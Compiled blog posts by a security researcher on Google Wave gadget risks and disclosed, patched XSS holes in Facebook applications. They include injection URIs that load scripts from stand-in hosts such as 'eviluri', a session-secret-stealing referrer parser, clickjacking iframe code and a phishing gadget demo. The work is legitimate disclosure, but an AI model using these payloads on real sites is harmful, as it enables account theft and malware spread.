Cross-Gadget Security in Google Wave

While examining the behavior of gadgets in Google Wave, I noticed another potential security problem in addition to the ones I’d already listed. Each gadget is loaded in a container iframe with a domain separate from the main page, preventing access to the DOM of the Wave interface itself.

However, I also noticed that the container iframes for all of the gadgets I tested used the same domain. That allows one gadget to access the DOM of another gadget. Pictured below is a test gadget that generates an alert displaying the HTML source of the first gadget in the wave, in this case a Yes/No/Maybe gadget from Google.
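
To illustrate the mechanics (a hedged sketch, not the actual test gadget's code): because sibling gadget frames share an origin, script in one gadget can walk the parent page's frames collection and read another gadget's document. The function name and shape below are mine; the window object is passed as a parameter purely so the logic is explicit.

```javascript
// Sketch of cross-gadget DOM access. The parent window (the Wave UI) is on
// a different domain, but the browser still exposes its frames collection,
// and a sibling frame's document becomes readable whenever that frame is
// served from the same origin as ours.
function readSiblingGadget(win, index) {
  try {
    return win.parent.frames[index].document.body.innerHTML;
  } catch (e) {
    // A cross-origin sibling throws a security error instead.
    return null;
  }
}

// Inside a malicious gadget, one could then run something like:
//   alert(readSiblingGadget(window, 0));
```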

A test gadget accessing the DOM of another gadget in Google Wave.

What’s the danger in this sort of cross-gadget access? Consider that people have already created gadgets for accessing your Facebook and Twitter accounts. Granted, most of those gadgets have used iframes which load other sites, and thus cross-domain rules would prevent any data breaches. Also, one Twitter gadget I tried actually loaded using its own container URI instead of the standard Google server. But as developers continue to publish more powerful gadgets, cross-gadget access poses serious risks for CSRF and data theft.


Google Wave as a Tool for Hacking

Many security researchers are familiar with BeEF, a browser exploitation framework by Wade Alcorn. In short, BeEF is a program that brings together various types of code for taking advantage of known vulnerabilities in web browsers. If a target computer loads a certain bit of code within a web page, that code connects to a server control panel which can then execute certain attacks against the “zombie” machine.

After noting potential security issues with the gadgets in Google Wave, I set about finally setting up a BeEF testbed to see if Google Wave was as capable a platform for malware delivery as I suspected.

Example of a BeEF zombie spawned via Google Wave

The picture above shows the results. I successfully created a Google Wave gadget that creates a new BeEF zombie whenever someone views the wave. This does not allow for the keylogger function of BeEF, but I did send an alert dialog (as shown) and used the Chrome DoS function to crash the browser tab. (I could also detect that the zombie machine had Flash installed – imagine the possibilities of using Flash or PDF exploits in an auto-loaded gadget.)

What’s even more disconcerting is that BeEF can integrate with Metasploit to potentially take over a victim’s machine. I do not currently have Metasploit set up to test using Autopwn, but based on my experiences so far, I’m fairly confident such an attack would succeed.

All of these demonstrations about security and Google Wave point to four general weaknesses in Wave’s current structure:

  1. Allowing scripts and iframes in gadgets with no limits apart from sandboxing
  2. Lack of control over what content or users can be added to a wave
  3. No simple mechanism for verifying gadget sources or features
  4. Automatically loading gadgets when a wave is viewed

Any one of these issues would be cause for concern, but taken together they present such alarming possibilities as a user getting their computer hacked simply by viewing a wave. Whatever may be said about Google Wave’s usefulness, I have to conclude that the product is not ready for prime time until these types of problems are addressed.


Have You Seen the New Facebook Gadget for Google Wave?

Screenshot of a Facebook gadget inside Google Wave.

The above screenshot shows an actual gadget I created, running inside a wave for demonstration. Imagine the possibilities of connecting Facebook with Google Wave. You could post information to your Facebook profile right from within Wave, or connect wave participants to Facebook profiles. If you came across this gadget in a wave you were viewing, wouldn’t you love to at least try it out?

There’s just one problem. The above gadget is fake. Not the screenshot, mind you – if you’re a Google Wave user, you can see the gadget in action by inserting the gadget http://theharmonyguy.com/facebook.xml into a wave. But nothing will happen when you try to connect.

And in this case, truly nothing will happen, since I’ve designed the gadget to be harmless – your login information is not sent anywhere. But I imagine many users would fall prey to such a trick, which could easily be adapted for phishing attacks. Ask yourself honestly: would you have tried to log in? More importantly, if you came across such a gadget in a wave, how would you know whether it came from theharmonyguy.com, facebook.com, or a malicious host?

I post all this to raise a broader point than simply “beware of phishing attacks.” I realize that the balance between security and usability is a constant struggle for developers, or at least should be. Yet I’m somewhat concerned by the patterns we are training users to accept.

Case in point: chromeless gadgets within a wave that provide no indication of source. In some ways I almost feel that Google Wave is recreating the web browser. Browsers are applications that can load any sort of web page. Google Wave is an application that can load all sorts of web pages within waves. Yet many of the features developed for browsers to warn a user of insecure sites or phishing attacks (even as basic as the address bar, which shows the current domain) are not replicated when a user loads a gadget in Wave. Many have described Wave as a reinvention of e-mail. Reinventing a technology can be very beneficial, but let’s not forget lessons learned in the old technology – there’s a reason most e-mail clients don’t allow iframes and JavaScript, for instance.

I’m certainly not the first to raise these concerns; others have previously mentioned the danger of login forms on iGoogle gadgets. Nor am I saying that I don’t want Google Wave to succeed. But if we’re going to reinvent a technology, let’s address some of these basic issues of user expectations and security precautions from the start.


First Impressions on Security in Google Wave

Nearly two years ago, many technology sites brimmed with hype over a new Google technology called OpenSocial. Bloggers questioned if OpenSocial would spell the end of Facebook. Amid all the discussion, I felt that many people were ignoring several serious issues regarding how OpenSocial would handle user data, privacy, and security. A few people brought up questions on this topic, but until an actual implementation hit the market, no one seemed completely sure how OpenSocial would work in practice.

When I heard that Plaxo had brought an OpenSocial framework online, I decided to check out its security for myself. That led to the first hack of an OpenSocial application, and my white-hat hacking hobby began. Admittedly, the “hack” came from poor coding practices on RockYou’s part, but it highlighted the need for better authentication in OpenSocial, a problem corrected in later revisions. Still, the event was an inspiration, and it led me to continue investigating my previous hacks of Facebook applications, which in turn revealed the more serious issues in this year’s FAXX hacks.

Memories of two years ago came back to mind yesterday when I received a Google Wave invite from a friend. Wave has received its share of hype, despite not being publicly available, though lately it’s drawn increasing criticism. Yet I’ve not seen many people explore the security or privacy implications of using the new platform. I decided to take advantage of the invite and start hacking Wave.

What I found was rather surprising, though not entirely unexpected. I’ve noticed several issues with the current version that could be exploited or create more serious problems in the future. Some will argue that bugs should be expected in early versions of a new product, and that future upgrades will improve the situation. However, I would contend that some of the points raised here deal with basic aspects that should have been addressed from the very beginning. I would also add that I think Google overlooked an opportunity to add more social networking components to their system, which could have allowed them to offer a stronger alternative to Facebook.

Anyway, here are a few of the problems with Google Wave I’ve noticed so far that have not appeared on the several other lists of Wave criticisms I’ve seen:

  • Allowing iframes in waves. Creating a gadget that loads an iframe is a fairly trivial task. The iframe loads within a container iframe that separates it from the DOM for Wave itself. Still, one can load just about any page using such an iframe. This means that any attack requiring a user to load an infected page, such as my original demonstration of a FAXX hack, can be automated, since viewing the wave loads the iframe page. This can also be easily adapted to make POST requests for CSRF attacks.
  • Allowing invisible iframes in waves. Not only can a gadget include an iframe, it can style that iframe to be invisible, either hiding the attack from wave participants or creating a clickjacking attack within the gadget. Basically, while gadgets load in container iframes, they otherwise have free rein to include any HTML a coder desires. Note that allowing iframes could potentially let an attacker include code for finding browser exploits, which can then allow for malware delivery or even taking over a user’s system.
  • Allowing scripts in waves. Once again, the scripts execute in a container iframe, so one cannot simply wreak havoc with the main application DOM. But scripts do open up several possibilities. In fact, I’ve already created a wave that forwards users to a particular page as soon as they view the wave, since the script is loaded automatically when someone views the wave.
  • Allowing dynamic changes to gadgets. Google may argue that this problem is actually a feature. Essentially, a gadget is loaded dynamically from its source every time a wave is loaded. That means someone could insert an innocent-looking gadget into a wave, then the gadget owner could switch the gadget for a malicious one later on. In fact, since gadgets can be hosted anywhere, an included gadget could even be taken offline, undermining one of Wave’s selling points (better preserving a record of communications).
  • Allowing gadget access to participant information. Currently, a gadget can only access basic identifying information about who participates in a wave and who is viewing the wave when the gadget loads. However, one can already note several indications that Google will likely expand this functionality to resemble a more complete OpenSocial implementation. As with Facebook applications, allowing such unfettered access for any gadget on initialization raises a number of concerns.
  • Not allowing users to be removed from a wave. I realize that since waves are shared among participants, removing users raises questions of who in the wave is authorized to make such decisions. Still, I find it a glaring oversight that the product includes no mechanism for removing a user whatsoever, especially considering that anyone can join a public wave.
  • Allowing users to add anyone to a wave without approval. If I know the Google account you use for Wave, I can add you as a contact and add you to a wave, which will then appear in your inbox. This all happens without any action on your part. And if I include a malicious gadget, you will load that gadget as soon as you click on the new wave to find out what it’s about.

Once again, many will argue that Google will eventually address these problems, and I certainly hope they do. But I find such oversights of basic security issues rather disconcerting. And while sites such as iGoogle have included “gadgets” with scripts for some time, Wave adds a new dimension in that such gadgets can be loaded with hardly any user interaction or approval.

One possible solution that people will raise is that Google can shut down accounts of known attackers or spammers, ensuring that each Wave user corresponds to a real person who will abide by certain rules, as Facebook has sought to do. But doesn’t this turn Google Wave into exactly the same kind of walled garden which Facebook’s critics have lambasted so often? Yet if Google is not the gatekeeper and opens up the system to users with Google accounts, what has Wave done to address spam and malicious attacks? In fact, as expounded above, if Wave is open to anyone, it provides a powerful new means for delivering malware and exploiting vulnerable users.

Again, I realize that Wave will probably include more privacy controls, such as who can add you to a wave without your permission. But if Google is not building such controls into the product to start with, how effective will they be when they do finally appear?


The Dangers of Clickjacking with Facebook

Clickjacking is an admittedly difficult problem to solve entirely, though I question why invisible iframes are necessary. Still, a few techniques to combat the attack exist, such as frame-busting scripts. Twitter implemented this approach after a proof-of-concept attack circulated earlier this year; at the time, several researchers speculated on the ramifications for other sites, such as Facebook.
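
A frame-busting script of the sort Twitter deployed boils down to a few lines. This is a minimal sketch, not Twitter's actual code; the window references are passed in as a parameter purely so the logic can be exercised outside a browser, where a real page would run the classic one-liner directly.

```javascript
// Minimal frame-busting sketch. A real page would simply run:
//   if (top !== self) { top.location = self.location; }
// If the page finds itself inside someone else's frame, it navigates the
// top-level window to its own address, escaping the framing page.
function bustFrames(win) {
  if (win.top !== win.self) {
    win.top.location = win.self.location;
  }
}
```

Note that frame-busting can itself be defeated by a determined framing page, which is part of why clickjacking remains so hard to solve entirely.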

I’ve noted previously that authorizing a Facebook application requires only a single click, even if you’ve exempted your profile from the Facebook Platform. After noticing another possible clickjacking attack vector, I began compiling a list of single-click actions that should give any Facebook user pause. All of the following actions can be mistakenly performed by a user simply clicking a link or button on an innocent-looking page via clickjacking:

  • Authorize a malicious application. This can happen regardless of any privacy settings. On authorization, an application can immediately access your profile information, your photos, your posted links, your notes, your status updates, etc. It can also send notifications to your profile, send notifications to other people (anonymously or from you), and post feed stories to your wall, all with links included. Note that under default privacy settings, an application can access most of your data if a friend of yours falls prey to this type of attack.
  • Authorize a legitimate application with a cross-site scripting exploit. Most applications vulnerable to such an attack allow for clickjacking installs, where a single click authorizes the application and then forwards a user to an infected application page. That landing page can then execute any of the actions listed above for a malicious application. Note that if a friend falls for this attack and you have authorized the application, all of your data is vulnerable as well.
  • Post a link to your profile. This is possible by applying clickjacking to several Facebook pages used for sharing content. A custom title and description can be set for the link. Other content, such as a Flash video, can also be posted this way.
  • Publish a feed story from a malicious application. Note that this can work regardless of whether you have authorized the application. Applications may publish feed stories via a single click without prior authorization, though this does not grant them access to a user’s data. The feed story may include images, descriptive text, and links. The application can also pre-populate the user’s comments on the story, which would then be submitted upon execution of the clickjacking attack.
  • Send a message to another user. The recipient, subject, and message content, including links, can all be pre-populated. This no longer gives the recipient more access to data than usual, but could still be easily used to spread malware.
  • Send a friend request to another user. This means that a victim could unknowingly send a friend request to a malicious attacker’s profile, and the attacker would simply need to approve the request to gain access to everything on a user’s profile that their friends can access by default.
  • Harvest a user’s post_form_id. Those familiar with Facebook’s code will realize how serious this issue is. However, exploiting a post_form_id also requires knowing a user’s Facebook ID, and so far this attack does not provide the latter.

This list is not simply theoretical – I did some simple testing to make sure that each of these attacks worked. I also would not pretend that my list is exhaustive, and I would welcome any additions from other researchers.

Most of these are already known or fairly trivial to figure out. I am not aware of anyone reporting my method for the last attack, however, and I will be reporting the details of it to Facebook, as I believe it involves a code issue that can be patched apart from any clickjacking protection. Update: Facebook pushed a fix last night which I’ve confirmed. The hole came from a dialog page that one could load via a POST request. Outside its normal context, clicking the submit button on the page would forward a user back to the referring page but with the post_form_id appended.

I hope this list will help raise awareness of the potential dangers of clickjacking. Creating a Facebook version of Twitter’s “don’t click” worm would be fairly simple, and as this list indicates, one could do far more than simply post a link in the process.


The Month of Facebook Bugs Report

Introduction

The Month of Facebook Bugs, or FAXX Hacks, is a series of reports on vulnerabilities in Facebook applications. The series was a volunteer research project coordinated by an anonymous blogger known as theharmonyguy. All of the vulnerabilities were reported to Facebook and/or relevant application developers prior to their publication.

While one could take several approaches in enumerating “Facebook bugs,” this particular series focused on cross-site scripting holes in Facebook applications. The name FAXX refers to Facebook Application XSS+XSRF, as nearly any XSS vulnerability in a Facebook application allows a sort of cross-site request forgery in that one can use application credentials to make requests to the Facebook API. This is demonstrated in code examples below.

The series helps to quantify the sore lack of application security on the Facebook Platform, a fact perhaps well-known to those in the security community, but not to many others. Furthermore, anecdotal evidence suggests many Facebook users fail to understand distinctions between Facebook and third-party applications, much less the implications of issues with the current Facebook Platform, such as the level of access to user data brought by authorizing an application. Cross-site scripting vulnerabilities are significant on any web site, but when combined with a user’s trust in Facebook and access to the Facebook API, they become even more dangerous.

Summary of Findings

  • Many Facebook applications, even widely used ones or seemingly trustworthy ones, lack basic security precautions.
  • Specifically, cross-site scripting vulnerabilities were found in a wide range of Facebook applications.
  • Each such vulnerability can be exploited to execute malicious JavaScript, enabling attacks such as malware delivery.
  • In addition, such holes allow an attacker to access profile information, including personal details, status updates, and photos, of a victimized user and their friends.
  • Moreover, these vulnerabilities can be used to send notifications or post feed stories, allowing for viral distribution.
  • While each application hole affects users who have already authorized the application, clickjacking can often target users who have not.
  • The series focused on vulnerabilities in legitimate applications, but rogue applications, which could easily exploit clickjacking, have also been noted by others.
  • All of the vulnerabilities reported in the series have been patched, but attacks that exploit application holes remain possible.
  • Preventing future problems due to application vulnerabilities requires action from both application developers and Facebook.

Statistics

  • The series demonstrated vulnerabilities affecting over 9,700 Facebook applications.
  • Over half of the vulnerabilities affected applications that had passed the Facebook Verified Application program.
  • Six of the hacked applications ranked among the top ten by monthly active users at publication.
  • The published monthly active user counts for hacked applications total more than 218 million.
  • While the previous figure includes overlaps, each vulnerability affected any user who had authorized the application, whether currently active or not.
  • Nearly two-thirds of the vulnerabilities in the first half of the series allowed for clickjacking attacks that would affect any Facebook user. (Applications in the second half of the series were not checked for clickjacking due simply to time constraints.)
  • Vulnerabilities in popular applications that allow for clickjacking mean nearly any Facebook user could fall prey to a FAXX hack.
  • Seven of the current top ten application developers by combined monthly active users had at least one vulnerable application.
  • Nine of the developers contacted took over a week to build a patch for an application vulnerability.

Responsiveness

Many application developers were very responsive, expressed that application security was a priority, and appreciated notification of the vulnerabilities. I certainly recognize that it’s much easier to point out holes in someone else’s work than to spend the effort required to build a large-scale application. I applaud the efforts of hard-working developers who understand the seriousness of these problems and who take application security seriously.

That said, several developers took a while to respond to either me or Facebook. One vulnerability was not patched until more than two weeks after first being reported. I realize that patches take time, but this particular hole should have been a fairly simple fix.

I was also a bit disappointed by some of Facebook’s responses. Don’t get me wrong—I’m very grateful for the security contact who got in touch with me early on. He patiently fielded dozens of e-mails about application issues, and I thank him greatly for his efforts. But as I sent reports of discovered holes to Facebook, the Platform Policy Team would then notify the developer. (I also made a point of looking for e-mail addresses for developers, and always contacted them directly if I found any addresses.) On two occasions, I received a copy of the message that Facebook sent the developer. Here is the body of one of them:

To the developer of application ID#XXXXXXXX,

We’re writing to inform you that your application, [Application Name], has been reported to contain a cross-site scripting vulnerability. Specifically, the [URI parameter] parameter of the [page name] page can accept FBML or HTML that can load in other pages via an iframe.

Please contact theharmonyguy@gmail.com for more information, and let us know when this issue has been resolved.

Thank you in advance,

[Name]

Platform Policy Team

Facebook

As you can imagine, several developers who contacted me thought I was associated with Facebook. I would also note that the information I sent to Facebook included an example URI demonstrating the hole. After seeing the above e-mail, I mentioned the terseness of it to my security contact and requested Facebook communicate more with affected developers. I didn’t see any of the reports later in the month, but hopefully they were more helpful.

Lessons for Developers

  • Sanitize all inputs. That includes every bit of data processed by the application, whether loaded from a Facebook user’s profile, loaded from a database, submitted with a form, or received from the query string of an address. Never assume that a given parameter will be clean or of the expected type.
  • Sanitize all outputs. When displaying a notice or error message, load predetermined strings instead of using dynamic inputs. Never reuse the address of a page without filtering it for injection attempts. Filter any information you output to an application page or via an AJAX interface.
  • Avoid user-generated HTML. Generally, users should never be allowed to input HTML, FBML, or other rich-text formats. When allowing rich-text data, use pre-built, tested code for processing and displaying it, rather than trying to create your own filters.
  • Check every page. Many vulnerabilities appear in secondary pages, such as ad loaders or AJAX interfaces. Verify security precautions in every part of the application. If possible, consider storing secondary files in a folder other than that of the application’s canvas pages.
  • Verify Facebook sessions. Never rely on a cookie, a query string, or data generated within the application to verify the current user. Facebook provides applications with session information they can always check before making requests or loading information.
  • Use server whitelisting. If your application does not use AJAX or does not otherwise make requests using the Facebook JavaScript API, take advantage of the server whitelist feature in the application properties and only allow requests from your server.
  • Understand third-party code. Take the time to examine any code given to you by other developers, such as JavaScript tools or advertising network receiver files, before including them in your application. In particular, third-party code that harnesses a user’s session secret violates rules given by Facebook.
  • Don’t simply obfuscate. Never rely on JavaScript obfuscation or compression to hide vulnerabilities in application pages. Such techniques may slow down an attacker for a short while, but they can always be worked around or reversed.
  • Educate your users. Avoid incorporating design patterns that train users to accept bad practices, such as entering third-party passwords. Communicate clearly your policies on privacy, data retention, and information security.
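
The first two lessons above can be sketched with a minimal escaping helper. Most platforms ship an equivalent (PHP’s htmlspecialchars, for instance); this is illustrative, not a complete sanitizer.

```javascript
// Escape the five HTML-significant characters so that a query-string value
// rendered into a page cannot break out of an attribute or inject new
// elements. Ampersand must be escaped first so existing entities survive.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// escapeHtml('"><script>') yields '&quot;&gt;&lt;script&gt;',
// which a browser renders as inert text rather than markup.
```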

Lessons for Facebook

  • Stop the charade. Nearly all instances of user information and content are essentially public. Many users have an understanding of privacy and control not reflected by the findings of this series and others. Either take necessary action to address these issues, or drop illusory privacy controls.
  • Talk to developers. Several resources exist for helping developers get started on the Platform, but Facebook has published much less content reminding developers of security precautions. If you associate your brand with third-party code, you have a responsibility to help ensure the safety of that code.
  • Truly verify applications. The current Verified Applications program apparently does not address basic security flaws. Also, while opening the floodgates to any application has benefits, it also poses serious risks that may justify putting a few limits or checks in place.
  • Limit application access. While it’s encouraging to hear that Facebook will be adding granular access controls in response to the Canadian Privacy Commissioner, it’s disheartening that such steps took so long and are still nearly a year off from full implementation.
  • Take clickjacking seriously. This series has only begun to demonstrate the implications of clickjacking. Single-click authorization of applications, even when a user has exempted their profile from the Platform, only adds to the danger of clickjacking on Facebook pages.
  • Improve request verification. The Facebook JavaScript API may provide much useful functionality, but it also opens the door to simple API requests with merely a session secret. Other means exist for ensuring that requests come legitimately from an application instead of an attacker.
  • Distinguish your brand. With the current Facebook Platform, any vulnerability in a third-party application becomes a vulnerability for Facebook. Either users should be able to trust applications to the same degree as Facebook, or Facebook should more clearly distinguish third-party content.
  • Educate your users. People click applications without a second thought to the risks of rogue applications or possible security problems. Users may seek to share personal information with friends, but fail to realize how that information is used by third-party code.

Anatomy of an Attack

I now present a more detailed explanation of how FAXX hacks allow for viral attacks and stealing user information, along with code samples.

Suppose the imaginary Facebook application “Faceplant” includes a parameter “ref” on its home page, i.e. http://apps.facebook.com/faceplant/?ref=install. Further suppose that one of the links within the home page’s code appended the given ref parameter to the “href” attribute, i.e. <a href="http://apps.facebook.com/faceplant/play?ref=install">. Finally, suppose the application did not filter the “ref” parameter at all, e.g. the PHP code echo '<a href="http://apps.facebook.com/faceplant/play?ref='.$ref.'">';.

As you can probably see, the “ref” parameter introduces a cross-site scripting hole. For instance, loading the page http://apps.facebook.com/faceplant/?ref="><img> would render an image element when the page loads. Assuming Faceplant is an FBML application, one could load a URI similar to http://apps.facebook.com/faceplant/?ref="><fb:iframe src=http://eviluri/> to render a given iframe within the page. (Note that these URIs would need further encoding to actually function properly.) Since the source attribute for the iframe is arbitrary, one could load a page that executes malicious scripts for malware delivery or browser exploitation.
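
To make the mechanics concrete, here is the vulnerable Faceplant template transliterated from the PHP above into JavaScript (the function name is mine; Faceplant itself is, of course, imaginary):

```javascript
// The raw "ref" query parameter is concatenated straight into an href
// attribute, exactly like the echo statement in the example above.
function renderLink(ref) {
  return '<a href="http://apps.facebook.com/faceplant/play?ref=' + ref + '">';
}

renderLink('install');
// → '<a href="http://apps.facebook.com/faceplant/play?ref=install">'

renderLink('"><img src=x>');
// The payload closes the href attribute and the <a> tag, then injects
// its own element into the page.
```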

So far, we’ve simply described a standard XSS hole. But in a Facebook application, adding an fb:iframe does not simply load a standard iframe. The URI of the iframe page is appended with a series of session parameters, such as the current user’s Facebook ID and the current application’s API key. Making a request to the Facebook API, however, requires the session secret, or the fb_sig_ss parameter. But this parameter is only added to an iframe if the URI originates from the same path as the application itself. Thus in the example above, http://eviluri/ would not have access to the session secret.

In a non-FBML application, one can simply insert JavaScript which checks the page’s parameters, since the application canvas page will have the session secret. For an FBML application, things get a bit trickier – inserted JavaScript gets filtered as FBJS and may not allow for a reliable attack. However, buried in the source code of every FBML application page on apps.facebook.com is the JavaScript variable “source_url,” which gives the direct URI of the application that Facebook loads the FBML from. Accessing this URI directly with valid session parameters appended will load the FBML source into your web browser. While a browser won’t understand all the FBML, it will still load HTML elements as HTML – including script elements.

This brings us to what I refer to as a double-injection trick. If you find an XSS hole in a page on apps.facebook.com, you’ve actually found an XSS hole in the original FBML page that Facebook loads. Thus you can apply the same XSS hole to the original page. The trick works like this: use the XSS hole in the apps.facebook.com URI to insert an fb:iframe that references the original page’s URI. Since this page is hosted on the same path as the application, it will receive the session secret. For example, http://apps.facebook.com/faceplant/?ref="><fb:iframe src=http://faceplantapp/index.php>. Now, use the XSS hole a second time by setting the URI of the inserted fb:iframe to insert JavaScript into the direct application page, that is, http://apps.facebook.com/faceplant/?ref="><fb:iframe src='http://faceplantapp/index.php?ref="><script src=http://evilscript/>'>. (Once again, this would have to be encoded properly, but I leave these examples unencoded to make the process more readily clear.) The JavaScript can simply check the URI of the page that loads it to access the session secret.

But even this method does not always work. If the direct application page includes script before the inserted code, it may fail to execute in the absence of Facebook’s processing, and thus the inserted code will not load. We can thus use another trick to get the session secret. Instead of inserting JavaScript directly, insert yet another iframe, as in http://apps.facebook.com/faceplant/?ref=”><fb:iframe src=’http://faceplantapp/index.php?ref=”><iframe src=http://eviluri/>’>. Now note that this second iframe is loaded by the application page, which has received the session secret from the fb:iframe. Hence, the referrer for the second iframe will include the session secret. The page at http://eviluri/ can simply load JavaScript that checks the referrer and grabs the session secret. This code can then make any Facebook API request that the application itself is authorized to make under a user’s session.
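The page at http://eviluri/ only needs to parse its own referrer for the fb_sig_ss parameter. A minimal sketch, assuming the referrer carries the full application URI as described above (the function name is mine, not part of any Facebook API):

```javascript
// Hypothetical sketch of the code hosted at http://eviluri/: the second
// iframe's Referer header (exposed to scripts as document.referrer)
// contains the full URI of the application page, session secret included.
function secretFromReferrer(referrer) {
  // Match the fb_sig_ss parameter anywhere in the referring URI.
  const match = /[?&]fb_sig_ss=([^&]*)/.exec(referrer);
  return match ? decodeURIComponent(match[1]) : null;
}

// In the attack page: secretFromReferrer(document.referrer);
```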

For more details on how this would work, download viraluri.txt and eviluri.txt. These are two text files with HTML source code for two files to be used in an attack on Flixster (Movies), utilizing the hole previously reported in that application (and now fixed). The first file uses clickjacking and an invisible iframe to load an apps.facebook.com URI which inserts http://eviluri/ as above. The second file represents the code that one would host at http://eviluri/ to then steal user information, post a link to http://viraluri/ (the address at which the first file would be hosted) on the user’s profile, and send a notification to a given user with a link to http://viraluri/ as well. Finally, the code forwards the user to http://innocenturi/ to avoid any suspicion.

Wrapping Up

I could say so much more about this series and all it involved, but I feel the need to bring this report to a close. I may post additional observations later on. I also want to add that I do not want to come across too harshly towards application developers or Facebook – I recognize steps they have taken to help and protect users in many ways. I can attest from experience that Facebook generally produces very secure code, for instance. But at the same time, I still see much more that could be done, especially considering the wide range of personal information that users share on Facebook compared to other sites.

Regardless, this series provides quantifiable demonstrations of the state of application security on the Facebook Platform, and the results are far from encouraging. I hope it will spark further dialogue about Facebook applications and social networking security in general.


Even More Facebook Bugs

Facebook allows applications to request “extended permissions” – the ability to perform actions not normally allowed for applications, such as updating a user’s status or adding photos to their profile. In the past, these were limited and not used all that often, but more recently several applications have been adding novel uses that require extended permissions.

Once I finished up with the Month of Facebook Bugs project (the full report is coming along and should be posted today or tomorrow), one item on my to-do list was checking how granting extended permissions worked in practice. I’ve noticed cases before where an application would request one extended permission and be granted several.

But this morning, I noticed a friend’s status was a message about taking a quiz (an application built using Quiztacular), along with a link. Since this wasn’t the usual feed story, I checked out the application myself, and sure enough it updated my status – without ever requesting extended permissions.

Further investigation revealed that it had been granted the following extended permissions anyway: Status Update, Add Photos, Add Videos, Create Notes, Share, Stories, and Publish to Streams. I then tried installing several other new applications, and each time I authorized one, it would then automatically appear under each of these seven extended permissions. (You can check which applications have extended permissions here.)

I first noticed this issue a little over an hour ago, and sent an e-mail to my contact at Facebook after confirming the issue. I just did another check and the bug is still present.

While investigating that bug this morning, I also came across another surprising aspect of the Facebook Platform. I visited one application page that did not require authorization when first loaded. (Note that this is not unusual – if an application page does not request any user information, it can load as if it were a normal web page.) The page then brought up a typical Facebook pop-up requesting to post a story on my wall about the reward I’d been granted. Intrigued, I clicked “Publish,” and was then forwarded to a page requesting I authorize the application so I could use my reward in actual gameplay.

I checked my profile before authorizing the application, and to my shock, the feed story sat at the top of my wall, complete with pictures and links. At first this may not appear to be a problem, as the application did not gain access to any of my information and I had to give my approval to post the story. But those familiar with previous posts on this blog will recognize the danger of clickjacking. One could easily build a rogue application page that requests a feed story, load it in an invisible iframe, and with one click users would publish a story that could easily include malicious links.
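The rogue page described above needs little more than a transparent iframe stacked over a decoy button. This sketch generates such a frame; the target URI is a placeholder of my own, and nothing here is Facebook’s code:

```javascript
// Hypothetical sketch of the clickjacking setup: the story-publishing
// pop-up is loaded in a fully transparent iframe layered over a decoy
// element, so one click on the decoy actually lands on "Publish".
function buildInvisibleFrame(targetUri) {
  return '<iframe src="' + targetUri + '"' +
    ' style="position:absolute; top:0; left:0;' +
    ' width:100%; height:100%; opacity:0; z-index:2;"></iframe>';
}

// A rogue page would inject this over a "Click to continue" button:
//   document.body.innerHTML +=
//     buildInvisibleFrame('http://apps.facebook.com/roguegame/');
```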

I trust that Facebook will patch the extended permissions bug (which brings back memories of #Twitbook) quickly, and I would hope that they would address the serious danger of the story publishing setup. But I’m not holding my breath on the latter, given Facebook’s track record with this sort of issue. (And on that note, why did the blogosphere take Twitter to task over clickjacking, but has yet to notice Facebook’s complete lack of clickjacking protection?)

Update (Oct. 8): I got word about three hours ago from Facebook that a fix was being pushed for the first issue posted here (the extended permissions bug). I just checked and can confirm the patch: Applications no longer receive extended permissions on authorization, and the applications that had been mistakenly authorized no longer have those permissions. Good work, Facebook.


FAXX Hack: YoVille

We’ve come to the end in the Month of Facebook Bugs – today’s post marks the last published FAXX Hack for September. The series began with a vulnerability in the no. 1 Facebook application, FarmVille from Zynga. Today we end with a very similar hole in another major Zynga application, discovered about two weeks ago.

I have much to cover in recapping this month, and it will likely take a few days to put everything together. I plan on posting a full report that includes statistics and more detailed explanations on how some of these hacks work. Also, as promised, I intend to post demonstration code showing how these holes can be exploited to access user information and spread virally, in addition to standard XSS issues, such as delivering malware.

Thanks for your interest in the Month of Facebook Bugs, and please stay tuned for the upcoming final report.

Facebook Verified Application

Current Monthly Active Users: 17,944,265

Current Rank on Application Leaderboard: 9

Application Developer: Zynga

Responsiveness: Zynga has been one of the most responsive developers I contacted. They replied quickly and patched the hole soon after.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/yoville/index.php?type=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F

